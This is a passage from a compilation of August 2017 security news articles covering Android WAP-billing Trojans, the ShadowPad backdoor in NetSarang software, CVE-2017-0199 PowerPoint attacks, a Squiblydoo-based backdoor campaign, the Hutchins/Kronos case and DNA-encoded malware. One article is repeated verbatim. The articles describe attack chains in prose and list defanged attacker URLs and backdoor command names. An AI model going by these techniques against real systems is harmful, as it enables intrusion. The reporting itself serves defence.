After starting, the Trojan will ask the user to activate device administrator rights for this Trojan. After that, the Trojan will delete its icon from the app list so users won’t be able to easily find it. Meanwhile the Trojan will continue working in the background, receiving its CnC commands to open URLs and click on buttons.

Part of Trojan-Clicker.AndroidOS.Autosus.a code to work with data from CnC
This Trojan attacked more than 1,400 users in July 2017, most of them were from India (38%), South Africa (31%) and Egypt (15%).


When talking about clickjacking WAP-billing services, we should mention Trojan-SMS.AndroidOS.Podec.a. This Trojan – initially found in 2014 – was a regular Trojan-SMS until 2015, when cybercriminals switched to attacking WAP-billing services. This Trojan has lots of functionality but its main task is to steal money by subscribing users to WAP services. It was the first mobile Trojan that was able to bypass captcha. Over the next few years it became of the most popular mobile Trojans. It’s last appearance in the top 20 most popular mobile Trojans was in Q2 2016.

Podec is still actively distributing, mainly in Russia. It was the third most common Trojan in June 2017, among other Trojans abusing WAP-billings.


During last few months, we have detected a growth of Trojans attacking WAP-billing services in different countries. Although Trojans with such functionality have been infecting users for years, we see, that there are several new Trojans, and the number of infected users has been significantly increased in recent months. Furthermore, previously WAP-billing services were under attack mostly in Russia, but now we have detected such attacks in different countries, including India and South Africa.

Even some Trojans which traditionally specialized in other attacks, started stealing users’ money by clickjacking WAP-billing services.

We weren’t able to find a reason why so many cybercriminals decided to switch or to start attacking WAP-billing services at the same time. WAP-billing services are not a new thing – in some countries they’ve been existed for several last years.



Code Linked to MalwareTech and Kronos Published in 2009

21.8.2017 securityweek Virus
A piece of code linked to both the British researcher Marcus Hutchins, known online as MalwareTech, and the banking Trojan named Kronos was first published in 2009.

Hutchins became famous and was named a “hero” after he helped stop the WannaCry ransomware attack by registering a domain that acted as a kill switch for the malware.

The researcher was arrested in early August in the United States as he had been preparing to return to the U.K. and was charged for his alleged role in creating and selling Kronos. He has pleaded not guilty to the charges brought against him and released on bail during his trial. He cannot leave the U.S. and will be tracked via GPS, but authorities have allowed him to access the Internet – except for the domain used to stop the WannaCry outbreak.

The only information provided so far by authorities regarding the case they have against Hutchins is that he and an unnamed partner allegedly created and sold the Kronos malware in 2014 and 2015.

While it’s unclear what evidence these accusations are based on, some believe it may have something to do with a tweet posted by MalwareTech in February 2015, when he claimed a hooking engine he made had been abused by malware developers.

A researcher known online as “Hasherezade” has published a detailed analysis of Kronos, a piece of malware that has been around since 2014, on the Malwarebytes blog. The expert pointed out that the code used by Kronos authors to implement hooking, a technique for modifying the behavior of an application by intercepting function calls or messages passed between different components, is similar to one published by MalwareTech on his GitHub account.

However, as a Greece-based experts noted, the hooking technique found in both Kronos and MalwareTech’s GitHub account was first described in 2009.

MalwareTech is not allowed to discuss his case with anyone, but he pointed out on Twitter that none of the code found on his GitHub account implements new techniques and instead represents proof-of-concept (PoC) code for existing methods.

It’s unclear at this point if investigators used these similarities to link Hutchins to Kronos and if the code that the researcher claimed was stolen from him in 2015 was used in this banking Trojan or different malware.

According to Hasherezade, an analysis of the Kronos code suggests that its author is a skilled malware developer.

“The code is well obfuscated, and also uses various tricks that requires understanding of some low-level workings of the operating system. The author not only used interesting tricks, but also connected them together in a logical and fitting way. The level of precision lead us to the hypothesis, that Kronos is the work of a mature developer, rather than an experimenting youngster,” Hasherezade said.

While many have named Hutchins a hero for his role in stopping the WannaCry outbreak, some, including Immunity founder Dave Aitel, believe he may have actually been involved in the WannaCry attack.

Legal aspects of the case

In the meantime, some media reports claim Britain’s GCHQ spy agency knew that the FBI had been investigating Hutchins before he travelled to the United States. People familiar with the matter told The Sunday Times that the expert’s arrest in the U.S. freed the British government from the “headache of an extradition battle.”

While Hutchins awaits trial, some legal experts have called into question the constitutionality of the indictment.

“Since Hutchins’ indictment, commentators have questioned whether the creation and selling of malware—without actually using the malware—violates the two statutes under which Hutchins was charged: the Computer Fraud and Abuse Act and the Wiretap Act. It is likely that these issues will be litigated as the case unfolds,” said Alex Berengaut, a lawyer with Covington & Burling.

“But there is another question raised by the indictment: whether it violates Hutchins’ constitutional rights to charge him for his alleged conduct under any statute in this country,” Berengaut added. “Several circuits—including the Seventh Circuit, where Hutchins’ case will be heard—have recognized that the federal government cannot charge anyone, anywhere in the world irrespective of their connections to the United States.”

Researchers Uncover Infrastructure Behind Chthonic, Nymaim Trojans

17.8.2017 securityweek Virus
While analyzing malware that uses PowerShell for infection, Palo Alto Networks managed to uncover the infrastructure behind recent attacks that leveraged the Chthonic and Nymaim Trojans, along with other threats.

The analysis kicked off from one malicious sample, but resulted in security researchers from Palo Alto Networks being able to identify 707 IPs and 2,611 domains supposedly being utilized for malicious activity. While some of these resources are used to host malware, others are leveraged in other types of attacks and schemes, the researchers say.

Palo Alto Networks’ Jeff White explains that, while PowerShell is typically launched from Microsoft Office documents using VBA macros and is used to download and execute the actual malware, what determined the recent investigation was the fact that the analyzed code was downloading a file from the legitimate Notepad++ website.

After accessing the site to download the file directly and discovering that all looked normal, the researcher took a closer look at the VBA code and discovered multiple functions decoding information from various arrays, as well as the fact that the code was executing an already decoded PowerShell command.

By looking at variables in the PowerShell command, White eventually discovered 171 document samples, all fairly recent and all showing the same themes for lures, and also extracted the URLs used to download over two dozen payloads from half as many domains.

One of the discovered binaries, apparently compiled in August, was observed launching a legitimate executable and injecting code into it to “download further payloads through a POST request to various websites.” This behavior is shared across the original samples and White also matched observed HTTP requests to patterns already associated with the Chthonic banking Trojan.

Further analysis of the initial 171 documents revealed a set of 8 domains, while the analysis of POST and HTTP requests to them led the researcher to identifying over 5,000 observed samples as the Nymaim downloader Trojan.

Most of the samples came from only four sites: ejtmjealr[.]com, gefinsioje[.]com, gesofgamd[.]com, and ponedobla[.]bit. The ejtmjealr[.]com domain, the researcher points out, is clearly associated with ejdqzkd[.]com, a site discussed in a CERT.PL analysis of Nymaim earlier this year.

Looking at the passive resolutions for the discovered domains, the researcher found a total of 707 IP addresses associated with them.

Some of the IPs had a shared infrastructure, and the researcher used reverse DNS to uncover more sites linked to them, including an “idXXXXX.top” pattern supposedly associated Nymaim (similar to the “ejXXXXX.com” domains).

This eventually led to the discovery of all the domains associated with the IPs, and allowed the researcher to single out two clusters of infrastructure that also interconnect.

The investigation also revealed the infrastructure is also used for the distribution of other malware families, such as the Locky ransomware.

The shared infrastructure is also used to host a forum of illegal services, while some clusters of domains are “used by the Hancitor malware dropper to host the initial check-in and tracking.”

The security researchers published the lists of 707 IPs and 2,611 domains uncovered as part of this investigation on GitHub.

“These findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGA’s, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity,” Palo Alto’s researcher concludes.

Researchers Uncover Infrastructure Behind Chthonic, Nymaim Trojans

17.8.2017 securityweek Virus
While analyzing malware that uses PowerShell for infection, Palo Alto Networks managed to uncover the infrastructure behind recent attacks that leveraged the Chthonic and Nymaim Trojans, along with other threats.

The analysis kicked off from one malicious sample, but resulted in security researchers from Palo Alto Networks being able to identify 707 IPs and 2,611 domains supposedly being utilized for malicious activity. While some of these resources are used to host malware, others are leveraged in other types of attacks and schemes, the researchers say.

Palo Alto Networks’ Jeff White explains that, while PowerShell is typically launched from Microsoft Office documents using VBA macros and is used to download and execute the actual malware, what determined the recent investigation was the fact that the analyzed code was downloading a file from the legitimate Notepad++ website.

After accessing the site to download the file directly and discovering that all looked normal, the researcher took a closer look at the VBA code and discovered multiple functions decoding information from various arrays, as well as the fact that the code was executing an already decoded PowerShell command.

By looking at variables in the PowerShell command, White eventually discovered 171 document samples, all fairly recent and all showing the same themes for lures, and also extracted the URLs used to download over two dozen payloads from half as many domains.

One of the discovered binaries, apparently compiled in August, was observed launching a legitimate executable and injecting code into it to “download further payloads through a POST request to various websites.” This behavior is shared across the original samples and White also matched observed HTTP requests to patterns already associated with the Chthonic banking Trojan.

Further analysis of the initial 171 documents revealed a set of 8 domains, while the analysis of POST and HTTP requests to them led the researcher to identifying over 5,000 observed samples as the Nymaim downloader Trojan.

Most of the samples came from only four sites: ejtmjealr[.]com, gefinsioje[.]com, gesofgamd[.]com, and ponedobla[.]bit. The ejtmjealr[.]com domain, the researcher points out, is clearly associated with ejdqzkd[.]com, a site discussed in a CERT.PL analysis of Nymaim earlier this year.

Looking at the passive resolutions for the discovered domains, the researcher found a total of 707 IP addresses associated with them.

Some of the IPs had a shared infrastructure, and the researcher used reverse DNS to uncover more sites linked to them, including an “idXXXXX.top” pattern supposedly associated Nymaim (similar to the “ejXXXXX.com” domains).

This eventually led to the discovery of all the domains associated with the IPs, and allowed the researcher to single out two clusters of infrastructure that also interconnect.

The investigation also revealed the infrastructure is also used for the distribution of other malware families, such as the Locky ransomware.

The shared infrastructure is also used to host a forum of illegal services, while some clusters of domains are “used by the Hancitor malware dropper to host the initial check-in and tracking.”

The security researchers published the lists of 707 IPs and 2,611 domains uncovered as part of this investigation on GitHub.

“These findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGA’s, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity,” Palo Alto’s researcher concludes.

Backdoor Found in Popular Server Management Software used by Hundreds of Companies
16.8.2017 thehackernews
Cyber criminals are becoming more adept, innovative, and stealthy with each passing day. They are now adopting more clandestine techniques that come with limitless attack vectors and are harder to detect.
Recently, cyber crooks managed to infiltrate the update mechanism for a popular server management software package and altered it to include an advanced backdoor, which lasts for at least 17 days until researchers discovered it.
Dubbed ShadowPad, the secret backdoor gave attackers complete control over networks hidden behind legit cryptographically signed software sold by NetSarang—used by hundreds of banks, media firms, energy companies, and pharmaceutical firms, telecommunication providers, transportation and logistics and other industries—for 17 days starting last month.
Important Note — If you are using any of the affected product (listed below), we highly recommend you stop using it until you update them.
Hacker Injected Backdoor Through Software Update Mechanism
According to researchers at Kaspersky Labs, who discovered this well-hidden backdoor, someone managed to hijack the NetSarang's update mechanism and silently insert the backdoor in the software update, so that the malicious code would silently deliver to all of its clients with NetSarang's legitimate signed certificate.
The attackers of the Petya/NotPetya ransomware that infected computers around the world in June used the same tactic by compromising the update mechanism for Ukrainian financial software provider called MeDoc and swapped in a dodgy update including NotPetya.
"ShadowPad is an example of the dangers posed by a successful supply-chain attack," Kaspersky Lab researchers said in their blog post published Tuesday. "Given the opportunities for covert data collection, attackers are likely to pursue this type of attack again and again with other widely used software components."
The secret backdoor was located in the nssock2.dll library within NetSarang's Xmanager and Xshell software suites that went live on the NetSarang website on July 18.
However, Kaspersky Labs researchers discovered the backdoor and privately reported it to the company on August 4, and NetSarang immediately took action by pulling down the compromised software suite from its website and replacing it with a previous clean version.
The affected NetSarang's software packages are:
Xmanager Enterprise 5.0 Build 1232
Xmanager 5.0 Build 1045
Xshell 5.0 Build 1322
Xftp 5.0 Build 1218
Xlpd 5.0 Build 1220
Hackers Can Remotely Trigger Commands
The attackers hide the ShadowPad backdoor code in several layers of encrypted code that were decrypted only in intended cases.
"The tiered architecture prevents the actual business logics of the backdoor from being activated until a special packet is received from the first tier command and control (C&C) server (activation C&C server)," the researchers wrote.
Until then, the backdoor pings out every 8 hours to a command-and-control server with basic information on the compromised computers, including their domain names, network details, and usernames.
Here's how the attackers activate the backdoor:
The activation of the backdoor was eventually triggered by a specially crafted DNS TXT record for a specific domain name. The domain name is generated based on the current month and year, and performs a DNS lookup on it.
Once triggered, the command and control DNS server in return sends back the decryption key which is downloaded by the software for the next stage of the code, effectively activating the backdoor.
Once activated, the ShadowPad backdoor provides a full backdoor for an attacker to download and run arbitrary code, create processes, and maintain a virtual file system (VFS) in the registry, which is encrypted and stored in locations unique to each victim.
Kaspersky researchers said they could confirm activated backdoor in one case, against an unnamed company located in Hong Kong.
How to Detect this Backdoor and Protect Your Company
The company has rolled out an update to kill the malicious software on August 4, and is investigating how the backdoor code got into its software.
Anyone who has not updated their NetSarang software since then is highly recommended to upgrade to the latest version of the NetSarang package immediately to protect against any threats.
Additionally, check if there were DNS requests from your organization to the following list of domains. If yes, the requests to those domains should be blocked.
NetSarang installation kits from April do not include the malicious library.


Backdoors Found in Tools Used by Hundreds of Organizations

16.8.2017 securityweek Virus
Many organizations around the world using connectivity tools from NetSarang are at risk after researchers at Kaspersky Lab discovered that malicious actors had planted a backdoor in several of the company’s products.

NetSarang, which has offices in the United States and South Korea, specializes in secure connectivity solutions. Some of its most popular products are Xshell, Xmanager, Xftp and Xlpd.

Kaspersky discovered a backdoor in these tools after one of its customers in the financial sector noticed suspicious DNS requests coming from a NetSarang software package. An investigation conducted by the vendor revealed that the latest versions of Xmanager Enterprise 5 (build 1232), Xmanager 5 (build 1045), Xshell 5 (build 1322), Xftp 5 (build 1218) and Xlpd 5 (build 1220) had been compromised.

Security experts believe the attackers either modified source code or patched the software on NetSarang’s build servers after gaining access to the company’s systems. The affected builds were released on July 18 and the backdoor was only discovered on August 4.

NetSarang’s products are used by hundreds of financial, software, media, energy, electronics, insurance, industrial, construction, manufacturing, retail, telecoms, pharmaceutical and transportation companies. However, Kaspersky has only seen the malicious payload being activated on the systems of a company in Hong Kong.

Kaspersky says the malware could be lying dormant on the networks of other organizations, but NetSarang said it alerted the antivirus industry so security products may have already neutralized the malicious files.

The malware, detected by Kaspersky as Backdoor.Win32.ShadowPad.a, communicates with its command and control (C&C) server via DNS queries sent once every eight hours. The requests contain information on the infected machine, including user name, domain name and host name.

If the infected system is of interest to the attackers, they activate a fully fledged backdoor that they can use to download and execute other malware.

“If the backdoor were activated, the attacker would be able to upload files, create processes, and store information in a VFS [virtual file system] contained within the victim’s registry. The VFS and any additional files created by the code are encrypted and stored in locations unique to each victim,” researchers explained.

Kaspersky said the threat group behind this attack was careful not to leave too much evidence, but researchers did find some links to PlugX and Winnti, malware believed to have been developed by Chinese-speaking actors.

The security firm has provided indicators of compromise (IoC) to help organizations detect these attacks. NetSarang has also published a security alert to inform customers of the steps that need to be taken to address the issue.

Last month, NetSarang informed customers that it had released an update for Xshell after documents published by WikiLeaks revealed that the tool had been targeted by the CIA’s BothanSpy malware.

ShadowPad backdoor was spread in corporate networks through software update mechanism
16.8.2017 securityaffairs

Kaspersky Lab discovered attackers were able to modify the NetSarang software update process to include a malware tracked as ShadowPad backdoor.
Software update mechanism could be an efficient attack vector, news of the day is that hackers compromised the update process for a popular server management software package developed by NetSarang.

Attackers were able to modify the software update process last month and modified it to include a backdoor tracked as ShadowPad, that affected at least one victim’s machine in Hong Kong.

NetSarang Computer, Inc. provides secure connectivity solutions and specializes in the development of server management tools for large corporate networks in many industries, including financial services, energy, retail, technology, and media.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, that promptly sanitized its software update process by removing the malicious library nssock2.dll in its update package,

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

“Further investigation showed that the source of the suspicious DNS queries was a software package produced by NetSarang.”

Attackers have surreptitiously modified the software distributed by NetSarang to include an encrypted payload that could be remotely activated.

The attackers leveraged several layers of encrypted code to hide their ShadowPad backdoor and activate it only through the receiving of a special packet from the first tier command and control (C&C) server (“activation C&C server”).

“Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.” continues the analysis.

The module sends back to the C&C DNS server basic target information (domain and user name, system date, network configuration) and in turn receives back the decryption key for the next stage of the code, activating the ShadowPad backdoor.

The data exchanged between the module and the C&C server is encrypted with a proprietary algorithm, experts noticed that each packet also contains an encrypted “magic” DWORD value “52 4F 4F 44” (‘DOOR’ if read as a little-endian value).

ShadowPad backdoor software update process

The ShadowPad backdoor is a modular platform that can be used to download and execute arbitrary code on the infected system, create processes, and maintain a virtual file system in the registry,

The remote access capability implemented for the ShadowPad backdoor includes a domain generation algorithm (DGA) for C&C servers which changes every month. Expert noticed that the thread actor behind the ShadowPad backdoor have already registered the domains covering July to December 2017, a circumstance that led them to believe that the start date of the attack is around mid-July 2017.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is Jul 13, hackers signed the malicious code with a legitimate NetSarang certificate.

ShadowPad is an example of the dangers posed by an attack against software update process, recently other successful supply-chain attacks made the headlines such as the NotPetya that was spread through exploiting the software supply chain of the Ukrainian financial software provider MeDoc.

NetSarang customers urge to check their software to check the presence the backdoor. The affected versions of NetSarang containing the malicious nssock2.dll are Xmanager Enterprise 5 Build 1232, Xmanager 5 Build 1045, Xshell 5 Build 1322, Xftp 5 Build 1218 and Xlpd 5 Build 1220.

“Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software,” states Kaspersky Lab.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.

How Just Opening A Malicious PowerPoint File Could Compromise Your PC

15.8.2017 thehackernews Virus

A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office.
The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a patch was issued in April this year, but threat actors are still abusing the flaw through the different mediums.
Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file.
According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.
Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department.
Here's How the Attack Works:
The complete attack scenario is listed below:

Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request.
Step 2: Once executed, the PPSX file calls an XML file programmed in it to download "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature.
Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system.
Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone.
Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well.
The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.

British Researcher Pleads Not Guilty to Creating Malware

15.8.2017 securityweek Virus
British cybersecurity researcher Marcus Hutchins, known online as “MalwareTech,” has pleaded not guilty in a U.S. court to charges related to creating and selling a banking Trojan named Kronos.

The 23-year-old expert from Ilfracombe, England, became famous and was named a “hero” a few weeks ago after he helped stop the WannaCry ransomware attack by registering a domain that acted as a kill switch for the malware. MalwareTech had not made his real identity known online, but the fame brought by the WannaCry incident led to reporters tracking him down.

On Monday, Hutchins, who works for LA-based Kryptos Logic, pleaded not guilty in a Wisconsin federal court to all the charges brought against him. The hacker cannot leave the United States during his trial and he will be tracked via GPS.

Interestingly, while he will be allowed to access the Internet in order to continue working, he has been prohibited from accessing the domain used to stop the WannaCry outbreak.

The researcher was arrested while preparing to return to the U.K. from Las Vegas, where the Black Hat and Def Con security conferences had taken place. He was later released on a $30,000 bond, an amount raised by his friends and supporters.

The expert and an unnamed individual who Hutchins allegedly conspired with have been charged with six counts related to the creation, advertising, sale and use of the Kronos malware.

According to authorities, which claim these activities took place in 2014 and 2015, Hutchins’ partner attempted to sell the malware on dark web marketplaces, including the recently shut down AlphaBay, for $2,000 and $3,000.

Many believe the charges against the British researcher are the result of a mistake, considering his involvement in malware analysis. Some believe code written by him may have been weaponized by cybercriminals. A legal defense donation page has been set up to raise the funds necessary to ensure that Hutchins gets a fair trial.

"Marcus Hutchins is a brilliant young man and a hero," said Marcia Hofmann, the EFF and Zeitgeist Law attorney representing Hutchins at the hearing on Monday. "He is going to vigorously defend himself against these charges. And when the evidence comes to light we are confident he will be fully vindicated."

Hutchins is also represented by Brian Klein, a partner at Baker Marquart.

PowerPoint Slide Show Files Used to Install Malware

15.8.2017 securityweek Virus
PowerPoint Slide Show Files Exploited for RAT Distribution

A Microsoft Office vulnerability patched by Microsoft in April, after threat actors had been using it in live attacks, is being abused in a new manner to infect computers with a remote access Trojan, Trend Micro warns.

Tracked as CVE-2017-0199, the originally zero-day remote code execution vulnerability was previously abused in attacks leveraging malicious Rich Text File (RTF) documents, exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

In recently observed attacks, however, CVE-2017-0199 is being exploited using a new method where PowerPoint Slide Show is abused for malware delivery. The malicious document is delivered as attachment to a spear-phishing email attachment, and the security researchers suggest that, as part of the attack, a sender address masquerading as that of a business partner is being used.

The email message is supposedly an order request, but no business documents are attached to it. What is attached, however, is a malicious PowerPoint Show (PPSX file) that supposedly leverages CVE-2017-8570, a different Microsoft Office vulnerability (supposedly an error made by the toolkit developer).

Once the file has been executed, however, PowerPoint initializes the script moniker and runs the remote malicious payload via the PowerPoint Show animations feature. After the CVE-2017-0199 vulnerability is successfully exploited, it downloads a file called logo.doc, which is instead an XML file with JavaScript code.

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. This file is a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT) that, once executed, provides the attacker with the possibility to run remote commands on the user’s system.

The tool can be used to download and execute commands on the infected machine, to log keystrokes and screen activity, and to record audio and video using the system’s microphone and webcam. The Trojanized tool uses an unknown .NET protector to add more protection and obfuscation to hinder analysis even more, and also leverages encrypted communication.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” Trend Micro notes.

As always when the use of malicious documents delivered via spam email is involved, users should pay extra caution when opening them (the same applies to clicking on links in emails), even if they come from seemingly legitimate sources. Organizations should also implement mitigation techniques against phishing attacks, to avoid compromise.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.

DNA Contains Instructions for Biological and Computer Viruses
12.8.2017 securityaffairs

University of Washington scientists have created an experiment that shows how DNA can be used to not only create biologic viruses, but also viruses that can infect computers.
Deoxyribonucleic acid (DNA) is one of the oldest methods for storing information. It is found in almost all living cells and DNA information is used in nature to determine “traits as diverse as the color of a person’s eyes, the scent of a rose, and the way in which bacteria infect a lung cell.“
It is comprised of four different “nucleotides,” which combine in different ways to provide genetic instructions for different outcomes. I like to think of it like binary machine code where the combinations of 0’s and 1’s are combined to define a program for a computer to execute. This is probably a common analogy since scientists have been encoding digital data into organic DNA for a while now.
In 2012, Harvard researchers encoded an entire book in DNA. In 2013, researchers at the European Bioinformatics Institute encoded Shakespearean sonnets, digital photos and recording from Dr. Martin Luther King Jr.’s “I have a dream” speech in DNA. University of Washington researchers and Microsoft Research staff collaborated to store an OK Go music video in DNA in 2016. Although this last one may sound frivolous, it is an example that the technology is becoming more capable and easier to work with. While it is unlikely that DNA will replace more traditional digital storage mediums, it will likely find a few use cases for which it is specifically well suited. In other words, we can expect the decoding of DNA information as a regular occurrence. And whenever information is being handled, we should expect the bad guys to try and profit from it in unique ways.
This is exactly what Tadayoshi Kohno at the University of Washington was thinking about when he and his team devised the experiment to encode a malicious virus in DNA — a virus that doesn’t compromise humans, but computers. While much of scientists’ work with DNA happens with organic materials, some of it requires computers to decode the DNA information into a digital format and this is where the research team focused their attack.
[We] “synthesized DNA strands that, after sequencing and post-processing, generated a file; when used as input into a vulnerable program, this file yielded an open socket for remote control“, the authors wrote in their paper titled “Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More”

The team admits that they created the “best possible environment” in which to test their theory. They changed the source code of the fqzcomp DNA compressor to include a fixed data buffer which would be vulnerable to a buffer overflow attack. The next step was to encode the buffer overflow data into synthetic DNA. Encoding digital information into DNA that uses only four nucleotides with physical restrictions on the combinations is challenging and took many iterations, but the team was eventually able to come up with a viable formula and it was sent to Integrated DNA Technologies for synthesis.
When the vial of DNA was received from the synthesis service, the team now had a computer program vulnerable to the exploit encoded on that DNA and the test was ready to go. They sequenced the DNA samples using the known-vulnerable fqzcomp compressor and 37% of the time the attack was successful — the buffer overflow compromised the computer system and could have granted unauthorized access to the perpetrators.
“[the] attack was fully translated only about 37 percent of the time since the sequencer’s parallel processing often cut it short or—another hazard of writing code in a physical object—the program decoded it backward. (A strand of DNA can be sequenced in either direction, but a code is meant to be read in only one. The researchers suggest in their paper that future, improved versions of the attack might be crafted as a palindrome.)”, reads the Wired Magazine.
Is this a viable attack? It depends on many factors. The bad guys would have to compromise software used in the DNA sequencing and analysis stages like these researchers did. Or they would have to find existing vulnerabilities in the software currently being used (not hard to imagine when you realize how many vulnerabilities exist in all software.) The bad guys would also have to arrange for the target to receive a sample of the specially crafted malicious DNA, or find a vulnerability that could be exploited by known samples that did not require modification. There are a variety of ways the DNA processes could be compromised but for now, they are all complex with a low probability of success. It will take a lot of (financial) motivation or time for malicious researchers to make these attacks viable. But we know it is possible, so we can start to think about the implications now.
“We know that if an adversary has control over the data a computer is processing, it can potentially take over that computer,” says Tadayoshi Kohno. “That means when you’re looking at the security of computational biology systems, you’re not only thinking about the network connectivity and the USB drive and the user at the keyboard but also the information stored in the DNA they’re sequencing. It’s about considering a different class of threat.”

Malware campaign targets Russian-Speaking companies with a new Backdoor
11.8.2017 securityaffairs

Trend Micro spotted a new espionage campaign that has been active for at least 2 months and that is targeting Russian-speaking firms with a new backdoor
Security experts at Trend Micro have spotted a new cyber espionage campaign that has been active for at least two months and that is targeting Russian-speaking enterprises delivering a new Windows-based backdoor, Trend Micro warns.

The hackers leverage on many exploits and Windows components to run malicious scripts to avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017 and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.

Hackers are targeting financial institutions and mining firms with different spear phishing messages.

The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis publiahed by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code calls the odbcconf.exe normal executable to run the DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.

The DLL calls is used to power a Squiblydoo attack that leverages the Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

In May, experts at FireEye spotted a new APT group that was targeting Vietnamese interests around the globe, the hackers leveraged the Squiblydoo technique to enable the download of a backdoor from APT32 infrastructure.

Next, the real backdoor is downloaded and executed, it is an XML file that is downloaded from the domain wecloud[.]biz. Also in this case, it is executed exploiting the same Regsvr32-abusing Squiblydoo attack technique.

“This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It attempts to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

d&exec = download and execute PE file
gtfo = delete files/startup entries and terminate
more_eggs = download additional/new scripts
more_onion = run new script and terminate current script
more_power = run command shell commands
” reads the analysis.

Experts noticed that even if the attack chain appears complex, it starts leveraging a Microsoft Office exploit. The best defense still consists in patching and keeping software up-to-date.

Malware Encoded Into DNA Hacks the Computer that Reads It

10.8.2017 thehackernews  Virus

Do you know — 1 Gram of DNA Can Store 1,000,000,000 Terabyte of Data for 1000+ Years?
Even in March this year, a team of researchers successfully stored digital data — an entire operating system, a movie, an Amazon gift card, a study and a computer virus — in the strands of DNA.
But what if someone stores a malicious program into the DNA, just like an infected USB storage, to hijack the computer that reads it.
A team of researchers from the University of Washington in Seattle have demonstrated the first successful DNA-based exploit of a computer system that executes the malicious code written into the synthesised DNA strands while reading it.
To carry out the hack, the researchers created biological malware and encoded it in a short stretch of DNA, which allowed them to gain "full control" of a computer that tried to process the genetic data when read by a DNA sequencing machine.
The DNA-based hack becomes possible due to lack of security in multiple DNA processing software available online, which contains insecure function calls and buffer overflow vulnerabilities.
"We analysed the security of 13 commonly used, open source programs. We selected these programs methodically, choosing ones written in C/C++," reads the research paper [PDF], titled "Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More."
"We found that existing biological analysis programs have a much higher frequency of insecure C runtime library function calls (e.g., strcpy). This suggests that DNA processing software has not incorporated modern software security best practices."
To create the biological malware, the researchers translated a simple computer program into a short stretch of 176 DNA letters, denoted as A, G, C, and T, each representing a binary pair (A=00, C=01, G=10, T=11).
The exploit took advantage of a basic buffer overflow attack, in which a software program executes the malicious command because it falls outside maximum length.
The command then contacted a server controlled by the team, from where the researchers took control of a computer in their laboratory they were using to analyse the DNA file.
